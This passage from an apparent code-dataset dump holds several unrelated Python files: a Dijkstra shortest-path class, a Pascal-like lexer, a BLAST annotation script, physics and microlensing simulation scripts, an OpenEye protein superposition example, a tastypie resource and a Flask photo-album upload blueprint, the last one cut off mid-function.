untreatedPoints.remove(closestPoint) #retirer le point traité\n neighborPoints = self.visiterSommet(closestPoint)#obtenir la liste des voisins\n for i in range(len(neighborPoints)):#mettre a jour les voisins\n distanceBetween = self.getDistance(neighborPoints, closestPoint, i) #obtenir la distance entre les voisins et le point le plus proche\n dictDistance = self.updateDistance(dictDistance, distanceBetween, neighborPoints, closestPoint, i) #mettre a jour la distance et le chemin si il est favorable\n closestPoint = self.findClosest(dictDistance, untreatedPoints, i)#trouver le nouveau point le plus proche\n return(dictDistance[endPoint]) #rendre la distance la plus court entre le point de départ et le point d'arrivée en plus du chemin\n \n def createDictShortPath(self, startPoint):\n dictDistance = {}\n for x in self.dictAdj:\n if x == startPoint:\n dictDistance[x] = (0, [x])\n else:\n dictDistance[x] = (math.inf,[])\n return(dictDistance)\n \n def initiateFirstWhile(self,startPoint):\n closestPoint = startPoint\n distanceBetween = 0\n untreatedPoints = []\n for i in range(len(self.listPoint)):\n untreatedPoints.append(self.listPoint[i])\n return(closestPoint, distanceBetween, untreatedPoints)\n \n def getDistance(self,neighborPoints, closestPoint, i):\n for j in range(len(self.dictAdj[closestPoint])):\n if self.dictAdj[closestPoint][j][0] == neighborPoints[i]:\n distanceBetween = self.dictAdj[closestPoint][j][1]\n return(distanceBetween)\n \n def updateDistance(self, dictDistance, distanceBetween, neighborPoints, closestPoint, i):\n if dictDistance[neighborPoints[i]][0] > dictDistance[closestPoint][0] + distanceBetween:\n dictDistance[neighborPoints[i]] = (dictDistance[closestPoint][0] + distanceBetween, dictDistance[closestPoint][1] + [neighborPoints[i]])\n return(dictDistance)\n \n def findClosest(self, dictDistance, untreatedPoints, i):\n minimum = dictDistance[untreatedPoints[0]]\n minimumPoint = untreatedPoints[0]\n for i in range(len(untreatedPoints)):\n if dictDistance[untreatedPoints[i]] < minimum and dictDistance[untreatedPoints[i]] != -1:\n minimum = dictDistance[untreatedPoints[i]]\n minimumPoint = untreatedPoints[i]\n closestPoint = minimumPoint\n return(closestPoint)\n \nif __name__ == '__main__':\n wikiDictAdj = {'A' : [('B', 85),('C', 217),('E', 173)], 'B' : [('A', 85),('F', 80)], 'C' : [('A', 217),('G', 186),('H', 103)], 'D' : [('H', 183)], 'E' : [('A', 173),('J', 502)], 'F' : [('B', 80),('I', 250)], 'G' : [('C', 186)], 'H' : [('C', 103),('D', 183),('J', 167)], 'I' : [('F', 250),('J', 84)], 'J' : [('E', 502),('H', 167),('I', 84)]}\n \n GWikipedia = Dijkstra(wikiDictAdj)\n print(GWikipedia.listPoint)\n print(GWikipedia.matAdj)\n GWikipedia.Dijkstra('A', 'J')\n GWikipedia.Dijkstra('A', 'D')\n GWikipedia.Dijkstra('A', 'B')\n \"\"\"\n print(GWikipedia.DijkstraPseudo('A', 'J'))\n print(GWikipedia.DijkstraPseudo('A', 'D'))\n \"\"\"\n Exemple2matAdj = [[-1, -1, -1, 42, -1, 12],[-1, -1, 13, 2, -1, -1],[-1, 13, -1, 17, 15, -1],[42, 2, 17,-1,-1,-1],[-1, -1, 15, -1, -1,36],[12, -1, -1, -1, 36, -1]]\n Exemple2listPoint = ['A', 'B', 'C', 'D', 'E', 'F']\n \n GExemple2 = Dijkstra(matAdj = Exemple2matAdj, listPoint = Exemple2listPoint)\n \"\"\"\n print(GExemple2.DijkstraPseudo('A', 'C'))\n \"\"\"\n GExemple2.Dijkstra('A', 'C')\n \n \n Exemple3dictAdjEuclid = {'A' : ((0, 0), ['B', 'F']), 'B' : ((1, 1), ['A', 'C', 'F']), 'C' : ((2, 1), ['B', 'D']), 'D' : ((1, 3), ['C', 'E']), 'E' : ((3, 2), ['D', 'F']), 'F' : ((0, 2), ['A', 'E'])}\n GExemple3 = Dijkstra(dictAdjEuclid = 
Exemple3dictAdjEuclid)\n \"\"\"\n print(GExemple3.DijkstraPseudo('A', 'D'))\n \"\"\"\n GExemple3.Dijkstra('A', 'D')","sub_path":"NSI2.0/Projet_Dijkstra_Astar/Celian_Dijkstra.py","file_name":"Celian_Dijkstra.py","file_ext":"py","file_size_in_byte":9037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640444510","text":"# Alunos: Fernando Souza (11218354) e Kevin Veloso (11318626)\n\nimport re\n\ntry:\n progFile = open('./data/program.txt', 'r')\n table = open('./data/table.txt', 'w')\n\n delimiters = [';', '.', ':', '(', ')', ':=', ',']\n relationalOperators = ['=', '<', '>', '<=', '>=', '<>']\n addOperators = ['+', '-', 'or']\n multOperators = ['*', '/', 'and']\n\n program = progFile.read()\n\n rmvComents = re.sub(r'({.*\\}|(//.*)|(\\t))', \"\", program) # remove os comentarios e tabulacoes\n lines = re.split(r'\\n', rmvComents) # divide em linhas\n tokens = list()\n\n # lines eh string. isso aqui vai transformar em um array onde cada elemento eh uma linha\n for line in lines:\n tokens.append(re.split(r'(\\s)|(^and)|(^or)|(<>)|(:=)|([0-9]+\\.[0-9]*)|(;|:|\\(|\\)|,|<|>|=|\\+|\\.|\\-|\\*|\\\\|\\/)', line))\n\n # Remove os espacos em branco seguidos\n for token in tokens:\n while ('') in token:\n token.remove('')\n while None in token:\n token.remove(None)\n count = 1\n\n \n for token in tokens:\n tempToken = token\n\n for temp in tempToken:\n if re.match(r'[0-9]+([a-z].*|[A-Z].*).*', temp):\n aux = temp\n table.write(re.sub(r'[a-z].*|[A-Z].*', '', temp) + ' | ' + 'INTEIRO' + ' | ' + str(count) + '\\n' ) \n temp = re.sub(r'[0-9]', '', aux)\n\n if temp in delimiters:\n table.write(temp + ' | ' + 'DELIMITADOR' + ' | ' + str(count) + '\\n' )\n \n elif temp in addOperators:\n table.write(temp + ' | ' + 'OPERADOR DE ADICAO' + ' | ' + str(count) + '\\n' )\n \n elif temp in multOperators:\n table.write(temp + ' | ' + 'OPERADOR MULTI' + ' | ' + str(count) + '\\n' )\n \n elif temp in relationalOperators:\n table.write(temp + ' | ' + 'OPERADOR RELACIONAL' + ' | ' + str(count) + '\\n' )\n\n else:\n if re.match(r'((program)|(var)|(integer)|(real)|(boolean)|(procedure)|(begin)|(end)|(if)|(then)|(else)|(while)|(do)|(not))', temp):\n table.write(str(temp) + ' | ' + 'PALAVRA RESERVADA' + ' | ' + str(count) + '\\n' )\n elif re.match(r'((true)|(false))', temp):\n table.write(str(temp) + ' | ' + 'BOOLEAN' + ' | ' + str(count) + '\\n' )\n elif re.match(r'([0-9]+\\.[0-9]*)', temp):\n table.write(str(temp) + ' | ' + 'REAL' + ' | ' + str(count) + '\\n' )\n elif re.match(r'[0-9]+', temp):\n table.write(str(temp) + ' | ' + 'INTEIRO' + ' | ' + str(count) + '\\n' )\n elif re.match(r'_*[a-zA-Z]+[0-9]*_*', temp):\n table.write(str(temp) + ' | ' + 'IDENTIFICADOR' + ' | ' + str(count) + '\\n' )\n count+=1\n\nfinally:\n progFile.close()\n table.close() ","sub_path":"firstProject/lexical.py","file_name":"lexical.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"575206096","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : Marissa pier\nDate : 3 13 2019\nPurpose: Python program for blastomics\n\"\"\"\n\n\nimport os\nimport sys\nimport argparse\nimport csv\n#import Bio\n#from Bio import SeqIO\n\nfrom collections import defaultdict\n#-------------------------------------\n\ndef main():\n args = get_args()\n hits_header = ['qseqid', 'sseqid', 'pident', 'length', 'mismatch', 'gapopen', 'qstart', 'qend', 'sstart', 'send', 'evalue', 'bitscore']\n annotations_filename = 
args.annotations\n hits_filename = args.hits_file\n outfile = args.outfile\n\n if outfile=='':\n f_out = sys.stdout\n else:\n f_out = open(outfile,'w')\n\n if not os.path.isfile(hits_filename):\n print('\"{}\" is not a file'.format(hits_filename),file=sys.stderr)\n exit(1)\n if not os.path.isfile(annotations_filename):\n print('\"{}\" is not a file'.format(annotations_filename),file=sys.stderr)\n exit(1)\n\n f_annot = open(annotations_filename,'r')\n genus_dict = {}\n species_dict = {}\n csv_reader = csv.DictReader(f_annot) #using first line as hits_header\n\n for row in csv_reader:\n centroid = row['centroid']\n genus = row['genus']\n if not genus:\n genus = 'NA'\n species = row['species']\n if not species:\n species = 'NA'\n genus_dict[centroid] = genus\n species_dict[centroid] = species\n f_annot.close()\n\n print('seq_id\\tpident\\tgenus\\tspecies',file=f_out)\n\n f_hits = open(hits_filename,'r')\n #sseqid = []\n #pident = []\n csv_reader = csv.DictReader(f_hits,fieldnames=hits_header,delimiter='\\t')\n for row in csv_reader:\n #print(row)\n sseqid = row[\"sseqid\"]\n pident = row[\"pident\"]\n\n if sseqid in genus_dict:\n genus = genus_dict[sseqid]\n species = species_dict[sseqid]\n print('{}\\t{}\\t{}\\t{}'.format(sseqid,pident,genus,species),file=f_out)\n else:\n print('Cannot find seq \"{}\" in lookup'.format(sseqid),file=sys.stderr)\n\n f_out.close()\n\n\n\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Annotate BLAST output',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n 'hits_file',\n metavar='FILE',\n help='BLAST output(-outfmt 6)',\n type=str\n )\n\n parser.add_argument(\n '-a',\n '--annotations',\n help='Annotaiton file',\n metavar='FILE',\n default='',\n )\n\n parser.add_argument(\n '-o',\n '--outfile',\n help='Output file',\n metavar='FILE',\n default='',\n )\n\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"assignments/07-csv/blastomatic.py","file_name":"blastomatic.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"529486834","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.insert(0, '../lib')\nfrom sw import *\n\nimport os\nnum_corrida = \"10_bis\"\n\nos.makedirs(\"../data/corrida\" + num_corrida + \"/figs\", exist_ok=True)\nos.makedirs(\"../data/corrida\" + num_corrida + \"/theta\", exist_ok=True)\nos.makedirs(\"../data/corrida\" + num_corrida + \"/phi\", exist_ok=True)\nos.makedirs(\"../data/corrida\" + num_corrida + \"/E\", exist_ok=True)\nfile = open(\"../data/corrida\" + num_corrida + \"/params.txt\", 'w')\n\nNs = 20\nJ = 3\nD = 0.2 * J\nK = 0.5 * (D**2 / J)\nBi = 0\nBf = 2\nBp = 0.02\nBb = 1000 * (D**2 / J)\n\nB_iter = np.arange(Bi, Bf, Bp) * (D**2 / J)\nN_c = B_iter.size\n\ndef D_dm(xs, ys, xv, yv):\n v = np.zeros(3)\n v[0] = xv - xs\n v[1] = yv - ys\n return v\n\ndef B_caja(x, y, Bin, Bbo, Ns):\n B = np.zeros(3)\n c = np.heaviside((Ns-2) - x, 1)\n c *= np.heaviside((Ns-2) - y, 1)\n c *= np.heaviside(x - 1, 1)\n c *= np.heaviside(y - 1, 1)\n B[2] = Bin * c + Bbo * (1 - c)\n return B\n\nparams = \"L = \" + str(Ns) + \"\\n\"\nparams += \"J = \" + str(J) + r\" meV\" + \"\\n\"\nparams += \"D = \" + str(D / J) + \" J\" + \"\\n\"\nparams += \"K = \" + str(K * J/D**2) + \" D^2/J\" + \"\\n\"\nparams += \"Bi = \" + 
str(Bi) + \" D^2/J\" + \"\\n\"\nparams += \"Bf = \" + str(Bf) + \" D^2/J\" + \"\\n\"\nparams += \"Bp = \" + str(Bp) + \" D^2/J\" + \"\\n\"\nparams += \"Bb = \" + str(Bb * J/D**2) + \" D^2/J\"\n\nfile.write(params)\nfile.close()\n\nx, y = np.mgrid[0:Ns, 0:Ns]\nred = np.array(list(zip(y.ravel(), x.ravel())))\nvecinos = gen_vecinos(red, 1)\n\nprint(\"De \" + str(39) + \" a \" + str(100) )\n\nfor i in range(39, 100):\n B = B_iter[i]\n \n theta0 = np.load(\"../data/corrida\" + num_corrida + \"/theta/corrida\" + num_corrida + \"_\" + \"37\" + \".npy\")\n phi0 = np.load(\"../data/corrida\" + num_corrida + \"/phi/corrida\" + num_corrida + \"_\" + \"37\" + \".npy\")\n E0 = np.load(\"../data/corrida\" + num_corrida + \"/E/corrida\" + num_corrida + \"_\" + \"37\" + \".npy\")\n\n theta, phi, E = gs_ac(lambda xs, ys, xv, yv: J,\n lambda xs, ys, xv, yv: D * D_dm(xs, ys, xv, yv),\n lambda xs, ys: K,\n lambda xs, ys: B_caja(xs, ys, B, Bb, Ns),\n theta0, phi0, red, vecinos, 3 * Ns**2)\n\n E = np.append(E0, E)\n\n dE = -np.diff(E)\n npasos = dE.size\n pasos = np.arange(npasos)\n x = np.copy(red[:, 0])\n y = np.copy(red[:, 1])\n u = np.sin(theta) * np.cos(phi)\n v = np.sin(theta) * np.sin(phi)\n\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n plt.clf()\n\n fig, axs = plt.subplots(1, 2, figsize=(20, 8))\n\n axs[0].set_title(\"Convergencia\", size=20)\n axs[0].plot(pasos[-2*Ns**2:], dE[-2*Ns**2:], \"k\")\n axs[0].set_xlabel(\"Pasos\", size=15)\n axs[0].set_ylabel(r\"$\\Delta E$ [meV]\", size=15)\n\n axs[0].plot([], [], ' ', label=\"L = \" + str(Ns))\n axs[0].plot([], [], ' ', label=\"E = \" + str(E[-1]) + r\" meV\")\n axs[0].plot([], [], ' ', label=\"J = \" + str(J) + r\" meV\")\n axs[0].plot([], [], ' ', label=\"D = \" + str(D / J) + r\" $J$\")\n axs[0].plot([], [], ' ', label=\"K = \" + str(K * J/D**2) + r\" $\\frac{D^2}{J}$\")\n axs[0].plot([], [], ' ', label=\"B = \" + str(B * J/D**2) + r\" $\\frac{D^2}{J}$\")\n axs[0].plot([], [], ' ', label=\"Bb = \" + str(Bb * J/D**2) + r\" $\\frac{D^2}{J}$\")\n axs[0].legend()\n\n axs[1].set_aspect('equal', 'datalim')\n nz = axs[1].scatter(x, y, 350, np.cos(theta), vmin=-1, vmax=1, cmap=plt.cm.coolwarm_r)\n cb = fig.colorbar(nz, ax=axs[1], fraction=0.04, pad=0.05, ticks=[-1, -0.5, 0, 0.5, 1])\n cb.ax.set_title(r'$n_z$', size=30)\n cb.ax.tick_params(labelsize=15)\n cb.set_ticklabels([r\"$-1$\", r\"$-0.5$\", r\"$0$\", r\"$0.5$\", r\"$1$\"])\n axs[1].quiver(x, y, u, v, units='width', pivot=\"mid\", width=0.005, headwidth=3, scale=30)\n axs[1].axis(\"off\")\n\n plt.savefig(\"../data/corrida\" + num_corrida + \"/figs/corrida\" + num_corrida + \"_\" + str(i) + \".jpg\" )\n\n np.save(\"../data/corrida\" + num_corrida + \"/theta/corrida\" + num_corrida + \"_\" + str(i), theta)\n np.save(\"../data/corrida\" + num_corrida + \"/phi/corrida\" + num_corrida + \"_\" + str(i), phi)\n np.save(\"../data/corrida\" + num_corrida + \"/E/corrida\" + num_corrida + \"_\" + str(i), E)\n","sub_path":"scripts/corrida10_bis_c.py","file_name":"corrida10_bis_c.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"26571123","text":"import numpy as np\nimport SL_Lightcurve as lc\nimport matplotlib.pyplot as plt\nimport SL_Flux_Data as dat\nimport scipy.optimize as op\nimport emcee\n\ndef frange(start, stop, step):\n i = start\n while i < stop:\n yield i\n i += step\n \n#calculate the Flux parameters\ndef calc_F(model, y, sig2):\n '''solving for the flux parameters with a givin model using 
least squares'''\n    #A\n    A11 = np.divide((np.power(model,2)),sig2).sum()\n    Adiag = np.divide(model,sig2).sum() \n    A22 = np.divide(1,sig2).sum()\n    A = np.array(([A11,Adiag], [Adiag, A22]))\n    \n    #C\n    C1 = np.divide(np.multiply(model, y),sig2).sum()\n    C2 = np.divide(y,sig2).sum()\n    C = np.array(([C1], [C2]))\n    \n    #B\n    B = np.linalg.solve(A,C)\n    FS = float(B[0])\n    FB = float(B[1])\n    F = [FS, FB]\n    return F\n    \n#mcmc set up functions\ndef calc_Xi(y, model, yErr):\n    '''Calculates Xi^2 for a given model and magnification data (y) with error (yErr)'''\n    sig2 = np.power(yErr, 2)\n    F = calc_F(model, y, sig2)\n    FS, FB = F\n    Xi2 = np.divide(np.power(np.subtract(np.add(np.multiply(model, FS), FB), y),2),sig2)\n    Xi = Xi2.sum()\n    return Xi\n\ndef lnprior(params):\n    '''checking prior meets conditions'''\n    t0, u0, murel = params\n    #no conditions\n    return 0.0\n\ndef lnlike(params, x, y, yErr):\n    '''likelihood'''\n    dummy, model = lc.lightcurve(params, x) #magnification curve\n    Xi = calc_Xi(y, model, yErr)\n    return -0.5 * Xi\n\ndef lnprob(params, x, y, yErr):\n    '''posterior probability'''\n    lp = lnprior(params)\n    if not np.isfinite(lp):\n        return -np.inf\n    else:\n        return lp + lnlike(params, x, y, yErr)\n    \ndef MCMC(dim, walkers, iters, args, paramsGuess, burn):\n    ''' '''\n    nll = lambda *args: -lnlike(*args)\n    result = op.minimize(nll, paramsGuess, args=(x, y, yErr))\n    \n    print('\\n\\nRunning MCMC...\\n\\n')\n    \n    pos = [result[\"x\"] + 1e-4 * np.random.rand(dim) for i in range(walkers)]\n    sampler = emcee.EnsembleSampler(walkers, dim, lnprob, args=args)\n    pos, prob, state = sampler.run_mcmc(pos, iters) #100\n    \n    samples = sampler.chain[:, burn:, :].reshape((-1, dim))\n    \n    print('...MCMC COMPLETE\\n\\n')\n    return nll, sampler, pos, prob, state, samples\n\n#True Parameters\nt0True = 50\nu0True = 0.2\nmurelTrue = 1/40\nparamsTrue = [t0True, u0True, murelTrue]\nFSTrue = 0.0016\nFBTrue = 0.0001\nFTrue = [FSTrue, FBTrue]\ndays = 100 #observation duration\n\n#generate fake data\nx, y, yErr = dat.generate(paramsTrue, 200, days, 0.01, 0.1, 0.1, FTrue) \n#including the FTrue parameter means y and yerr will come out as flux values\nevent = []\nfor f in frange(0,days,0.25):\n    event.append(f)\nxTrue, yTrue = lc.lightcurve(paramsTrue, event) #builds magnification lightcurve\nyyTrue = dat.y_flux(yTrue, FTrue) #convert magnification values to flux\nplt.figure()\nxy = plt.errorbar(x, y, yerr=yErr, linestyle = 'None', color = 'k', \n                  capsize=2, marker = '.', markersize=2)\nxyyTrue = plt.plot(xTrue,yyTrue, 'c') #plot flux lightcurve\nplt.xlabel(\"Time (days)\")\nplt.ylabel(\"Flux\")\n\n\n#mcmc\nparamsGuess = [40, 0.4, 1/30]\ndim = len(paramsGuess)\nwalkers = 100\niters = 500\nargs = (x, y, yErr)\nburn = 100\n\nnll, sampler, pos, prob, state, samples = MCMC(dim, walkers, iters, args, paramsGuess, burn)\n\nt0MC, u0MC, murelMC = map ( lambda v : (v[1], v[2]-v[1] , v[1]-v[0]), zip(*np.percentile(samples, [16, 50, 84], axis=0)))\n\nparamsMC = [t0MC[0], u0MC[0], murelMC[0]]\n\nprint(paramsMC)\n\nxMC,yMC = lc.lightcurve(paramsMC, event)\nsig2 = np.power(yErr, 2)\ndummy, model = lc.lightcurve(paramsMC, x) #magnification curve\nF = calc_F(model, y, sig2)\nyyMC = dat.y_flux(yMC, F)\n\nxyMC = plt.plot(xMC,yyMC, 'r')\n\n#testing\n#dummy, model = lc.lightcurve(paramsTrue, x) #magnification curve\n#FTest = calc_F(model, y, sig2)\n#yTest = dat.y_flux(model, FTest)\n#xyTest = plt.plot(x,yTest, 'm')\n\nplt.show()\n","sub_path":"Progress 
Reports/0817/SL_MCMC.py","file_name":"SL_MCMC.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183508940","text":"#!/usr/bin/env python\n# (C) 2018 OpenEye Scientific Software Inc. All rights reserved.\n#\n# TERMS FOR USE OF SAMPLE CODE The software below (\"Sample Code\") is\n# provided to current licensees or subscribers of OpenEye products or\n# SaaS offerings (each a \"Customer\").\n# Customer is hereby permitted to use, copy, and modify the Sample Code,\n# subject to these terms. OpenEye claims no rights to Customer's\n# modifications. Modification of Sample Code is at Customer's sole and\n# exclusive risk. Sample Code may require Customer to have a then\n# current license or subscription to the applicable OpenEye offering.\n# THE SAMPLE CODE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED. OPENEYE DISCLAIMS ALL WARRANTIES, INCLUDING, BUT\n# NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n# PARTICULAR PURPOSE AND NONINFRINGEMENT. In no event shall OpenEye be\n# liable for any damages or liability in connection with the Sample Code\n# or its use.\n\n#############################################################################\n# Simple superimposition of a fit protein on to a reference protein\n#############################################################################\nimport sys\nimport os\nfrom openeye import oechem\nfrom openeye import oespruce\nimport tempfile\n\n\n# @ \ndef ReadProteinFromPDB(pdb_file, mol):\n ifs = oechem.oemolistream()\n ifs.SetFlavor(oechem.OEFormat_PDB, oechem.OEIFlavor_PDB_Default | oechem.OEIFlavor_PDB_DATA | oechem.OEIFlavor_PDB_ALTLOC) # noqa\n\n if not ifs.open(pdb_file):\n oechem.OEThrow.Fatal(\"Unable to open %s for reading.\" % pdb_file)\n\n temp_mol = oechem.OEGraphMol()\n if not oechem.OEReadMolecule(ifs, temp_mol):\n oechem.OEThrow.Fatal(\"Unable to read molecule from %s.\" % pdb_file)\n ifs.close()\n\n fact = oechem.OEAltLocationFactory(temp_mol)\n mol.Clear()\n fact.MakePrimaryAltMol(mol)\n return (mol)\n# @ \n\n\ndef main(argv=[__name__]):\n if len(argv) not in [3, 4, 5]:\n oechem.OEThrow.Usage(\"%s [global|ddm|weighted] [nowrite]\" % argv[0]) # noqa\n\n inp_method = \"\"\n if len(argv) > 3:\n allowed_methods = [\"global\", \"ddm\", \"weighted\"]\n inp_method = argv[3]\n if inp_method not in allowed_methods:\n oechem.OEThrow.Warning(\"%s superposition method is not supported.\\n\" % argv[3]) # noqa\n sys.exit(1)\n\n do_write = True\n if len(argv) == 5:\n if argv[4] != \"nowrite\":\n oechem.OEThrow.Warning(\"%s is not a valid option.\\n\" % argv[3])\n sys.exit(1)\n else:\n do_write = False\n\n ref_prot_file = argv[1]\n fit_prot_file = argv[2]\n\n ref_prot = oechem.OEGraphMol()\n fit_prot = oechem.OEGraphMol()\n\n ref_success = ReadProteinFromPDB(ref_prot_file, ref_prot)\n fit_success = ReadProteinFromPDB(fit_prot_file, fit_prot)\n\n if (not ref_success) or (not fit_success):\n oechem.OEThrow.Fatal(\"Unable to protein(s) from PDB file.\")\n\n opts = oespruce.OESuperpositionOptions()\n if inp_method == \"ddm\":\n opts.SetSuperpositionType(oespruce.OESuperpositionType_DDM)\n elif inp_method == \"weighted\":\n opts.SetSuperpositionType(oespruce.OESuperpositionType_Weighted)\n\n superposition = oespruce.OEStructuralSuperposition(ref_prot, fit_prot, opts) # noqa\n rmsd = superposition.GetRMSD()\n\n superposition.Transform(fit_prot)\n\n pdb_ext = \".pdb\"\n str_pos = fit_prot_file.find(pdb_ext)\n base_name = 
fit_prot_file[0:str_pos]\n temp_dir = tempfile.mkdtemp()\n output_fit_file = os.path.join(temp_dir, base_name + \"_sp.oeb.gz\")\n\n print(\"RMSD for the fit of\",\n fit_prot_file, \"to\", ref_prot_file, \"is\", rmsd, \"Angstroms.\\n\")\n print(\"Writing superimposed fit protein to\", output_fit_file)\n\n if do_write:\n ofs = oechem.oemolostream(output_fit_file)\n oechem.OEWriteMolecule(ofs, fit_prot)\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","sub_path":"venv/Lib/site-packages/openeye/examples/spruce/simplesuperposition.py","file_name":"simplesuperposition.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357225840","text":"from tastypie.resources import ModelResource,Serializer\nfrom cartridge.shop.models import Product\nfrom django.contrib.auth.models import User\n\n\nclass GetAllProducts(ModelResource):\n class Meta:\n queryset = Product.objects.all()\n allowed_methods = ['get']\n # fields = ['first_name','last_name','email']\n excludes = ['id']\n resource_name = 'product'\n include_resource_uri = False\n serializer = Serializer(formats=['json'])","sub_path":"mezshop/shop/api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"375572324","text":"'''\nAutor: Marcos Felipe da Silva Jardim\n-------------------------------------------\n'''\nfrom flask import Flask, Blueprint, render_template, session, request, url_for, redirect, escape\nimport config, modelo, os, json, shutil\nfrom datetime import datetime\nfrom time import time\nfrom bson import ObjectId\nfrom hashlib import sha1\n\n# Registrando o blueprint\nalbum = Blueprint('album', __name__, template_folder = 'templates');\n\nARQUIVOS_ACEITOS = ['png', 'jpg','jpeg', 'gif']\n\nCAMINHO = '/dados/static/imagens/'\n\n@album.route('/get_album', methods = ['GET'])\ndef get_album():\n mdb = modelo.Consulta.obter_db_mongo()\n # Passe sobre cada album e a cada imagem coloque o caminho statico dela\n dados = []\n for alb in mdb.albuns.find({}):\n temp = {'_id': str(alb['_id']), 'album': alb['album'], 'fotos': []}\n for ft in alb['fotos']:\n temp['fotos'].append({'_id': str(ft['_id'])})\n for key in ft.keys():\n if key == '_id': continue\n temp['fotos'][-1][key] = os.path.join('/static/imagens/', ft[key])\n dados.append(temp)\n return json.dumps(dados)\n\n\n@album.route('/album', methods = ['GET','POST', 'PUT', 'PATCH', 'DELETE'])\ndef album_():\n mdb = modelo.Consulta.obter_db_mongo()\n if request.method == 'GET': ## Retorna os albuns disponiveis\n return render_template('index.html')\n elif request.method == 'POST': # Cria o album\n resp = modelo.Utils.valida_dados(request)\n if 'erro' in resp.keys():\n return json.dumps(resp)\n # Veja se tem o atributo nome\n if not 'nome' in resp.keys():\n return json.dumps({'erro': 'O ATRIBUTO NOME NÃO FOI ENVIADO'})\n if len(resp['nome']) < 2:\n return json.dumps({'erro': 'O NOME DEVE TER AO MENOS 2 CARACTERES'})\n # Veja se consegue recuperar o nome\n if mdb.albuns.find({'album':resp['nome']}).count() > 0:\n return json.dumps({'erro': 'ESTE NOME DE ALBUM JÁ EXISTE'})\n # Insira o album\n ID = str(mdb.albuns.insert_one({\n 'album': resp['nome'],\n 'fotos': []\n }).inserted_id)\n return json.dumps({\n 'sucesso': 'ALBUM CRIADO COM SUCESSO',\n '_id': ID\n })\n elif request.method == 'PUT': # INclusao de imagens\n resp = modelo.Utils.valida_dados(request)\n if 
'erro' in resp.keys():\n return json.dumps(resp)\n # Veja o campo _id existe\n if not '_id' in resp.keys() or not resp['_id'] or len(resp['_id']) < 1:\n return json.dumps({'erro': 'FAVOR INFORMAR A QUAL ALBUM SE DESEJA ADICIONAR FOTOS'})\n # Veja se o album existe\n if mdb.albuns.find({'_id': ObjectId(resp['_id'])}).count() < 1:\n return json.dumps({'erro': 'ALBUM NÃO ENCONTRADO'})\n # Veja se contem o campo arquivos\n total = len(list(request.files.getlist('arquivos')))\n if total == 0:\n return json.dumps({'erro': 'FAVOR ENVIAR IMAGENS PARA COMPOR O ALBUM'})\n erros = [None for i in range(total)]\n # Faz loop sobre cada campo dentro de arquivos\n for x, arq in enumerate(request.files.getlist('arquivos')):\n # Valida o arquivo\n if not modelo.Utils.validar_arquivo(arq.filename, ARQUIVOS_ACEITOS):\n erros[x] = 'ARQUIVO INVÁLIDO %s' % arq.filename\n else: # Salva o arquivo na pasta e armazena ele no album\n # Pegando a extensao e criand o novo nome\n *_, ext = arq.filename.rsplit('.', 1)\n # Gerando novo nome para os 3 tamanhos de imagens\n nom = sha1(str(time()).encode()).hexdigest()\n novo_nome = nom+'-nor.'+ext\n novo_nome_peq = nom+'-peq.'+ext\n novo_nome_med = nom+'-med.'+ext\n try: # Tenta salvar o arquivo\n caminho_completo = os.path.join(CAMINHO, novo_nome)\n caminho_completo_peq = os.path.join(CAMINHO, novo_nome_peq)\n caminho_completo_med = os.path.join(CAMINHO, novo_nome_med)\n arq.save(caminho_completo)\n # Rotaciona ele na posicao correta\n modelo.Utils.rotacionar_imagem(caminho_completo)\n # Salva a imagem nos 2 formatos\n modelo.Utils.rotacionar_imagem(caminho_completo, (320,320), caminho_completo_peq)\n modelo.Utils.rotacionar_imagem(caminho_completo, (640,480), caminho_completo_med)\n\n # Agora inclui este nome de arquivo no banco\n mdb.albuns.update_one(\n {'_id': ObjectId(resp['_id'])},\n {'$push':{\n 'fotos': {'nor': novo_nome, 'med': novo_nome_med, 'peq': novo_nome_peq,\n '_id': ObjectId()}\n }}\n )\n except OSError:\n erros[x] = 'Erro ao tentar salvar o arquivo'\n # Verifica se temos algum erro e então retorna o json erro com seu array de erros\n tem_erro = None\n for erro in erros:\n if isinstance(erro, str):\n tem_erro = True\n break\n if tem_erro:\n return json.dumps({'erro': erros})\n else:\n return json.dumps({'sucesso': 'TODAS AS IMAGENS ENVIADAS COM SUCESSO'})\n elif request.method == 'PATCH': # Para alteração no nome do album\n resp = modelo.Utils.valida_dados(request)\n if 'erro' in resp.keys():\n return json.dumps(resp)\n # Veja o campo _id existe\n if not '_id' in resp.keys() or not resp['_id'] or len(resp['_id']) < 1:\n return json.dumps({'erro': 'FAVOR INFORMAR A QUAL ALBUM SE DESEJA ADICIONAR FOTOS'})\n # Veja se existe nome para o album\n if not 'nome' in resp.keys() or not resp['nome'] or len(resp['nome']) < 1:\n return json.dumps({'erro': 'O NOVO NOME PARA O ALBUM NÃO FOI INFORMADO'})\n # Veja se o album existe\n if mdb.albuns.find({'_id': ObjectId(resp['_id'])}).count() < 1:\n return json.dumps({'erro': 'ALBUM NÃO ENCONTRADO'})\n # 